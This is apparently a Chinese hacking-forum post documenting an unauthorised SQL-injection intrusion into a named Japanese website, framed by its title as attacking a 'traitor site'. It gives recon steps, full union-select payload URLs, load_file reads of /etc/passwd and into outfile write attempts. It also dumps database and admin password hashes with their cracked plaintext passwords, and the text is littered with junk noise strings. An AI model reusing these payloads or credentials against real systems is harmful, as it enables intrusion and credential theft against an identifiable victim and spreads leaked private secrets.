原创 检测汉奸站全过程

xiancda

补：www.zuaa.jp测试

# Z/ O( {( I- i# b5 E1 _/ q
( i! `* ?9 B1 A/ z* c* U0 x0x01. 检测 www.zuaa.jp 收集数据
" }2 H# O5 r2 Z& d9 d

0 w5 {$ ^; K9 A$ j0 d. |1 hwhatweb


: u  Q3 j& H+ s* O, \利用NMAP扫描
  ]2 s0 A! d# q* L
$ ^4 H* r# o! v1 S, Y; C中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
0x02.找注入点
找注入点：http://www.zuaa.jp/php/newsdetail.php?topic_id=390
4 w8 h+ {! J9 v! g, N1 o
. B' n& w0 Q2 ?3 w. F% f3 ]
0x03.order by
4 c; b$ I, f4 \6 R$ ~& g             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1

order by 28报错，order by 27正常
" y( I* j. o( A. F
0x04.   union手动查询
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
添加到 27 时正常显示
- a9 g( c; @6 H2 U7 A: J5 C
" }& W2 s) Z6 ^5 B8 v5 v7 g0 a2 w' }中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
* _# o9 Y. [, O; R" W$ t+ C( T8 U
0x05. info:
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27

user:            root@localhost
! R( B# c7 K' H$ e9 j9 U5 b0 [database:    openpne
version:      4.1.22
) A  O/ w/ C0 G$ I! S1 uos:             portbld-freebsd5.4
/ v$ X* G  `) f+ k5 \) i0 h3 F
0x06. root用户
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的（这种方法， 可以过大多数站）
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27

通过工具转换

中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

0x07. 利用 into outfile
全部都失败
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
* O' v, P3 @2 X, e: g* m
2 Z8 p0 N1 |- C1 Shttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php

页面显示“MDB2 Error:syntax error”
- i- @9 e: _2 Y3 v
0x08. 利用 mysql 4.1
: @; E# C9 ~# [- _4 ^) d0 n猜常规表名，字段未果 工具 sqlmap
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
9 ?# P& q+ U) K7 O$ r


0 W: k9 r7 M, F" S: v) _" k0x09. 查找后台
2 H# A) ]. s' ^2 L利用 现有的各种 后台工具尝试都不行
" v- d8 r6 j% s/ x: R
0x10.  MySL外联方法
从前面 nmap 收集的信息当中，可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码，然后再通过 mysql 工具外连 www.zuaa.jp 不行
5 l9 P1 e$ O, S+ T' d; M可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
0 h$ T& R/ B; Y+ Uhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user

: M; ], U9 b! t! T% i4 G: ^这个可以在 www.cmd5.com 解密
; P3 r8 X4 \( Eroot:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
/ S- S1 Z+ s& gchen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
: Q  X& n8 q5 z3 _8 S/ s: f' Qopenpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
2 E/ {# x- K: y+ P* ozuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
工具外连失败，据说防火墙策略只允许特定IP外连，具体不得知
2 F( z% V1 J; a) E0 i5 L* P
- t% ]& Q( r" b
0x11. 网站突破
4 r4 @3 G7 q) k发现网站的源程序 openpne, google 下载 openpne 源码


* _1 r  ]3 T+ d" {& C  }' {0x12. 默认信息利用
http://sns.zuaa.jp/?m=admin&a=page_login
( e1 a' }, K7 v# b
- b8 u  j9 e/ W; N& r表名 (c_admin_user) ，字段名（username,password）
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user

8 W9 l" l) h9 c& J1 a解密
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
zuaajp:c0923ec5857796a393da99905008c176,          zju1897

7 ]- `  {# ~" Z5 u5 a; r" ?中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
1 A% e& ^  r/ f$ [& W  y
: m' q  \8 w4 }+ u0 m  h# n  w# T0x13. 登录后台
. j8 H$ F2 j, ^9 E


0x14. 小结
利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 。
- m# O8 D. u  y) `$ }" a: t* ~9 h感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
6 u, Q4 a6 b: O9 |  ?5 V! B) ]' c------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

, A6 E. z- T* ]. `2 X最后声明：本人只负责了整理上传到论坛，让大家学习，不是原作者，原作者辛苦了！
# ], J2 E: O, t, U7 r2 M( o

荒村狂客

哪个牛人 费的这劲 入侵的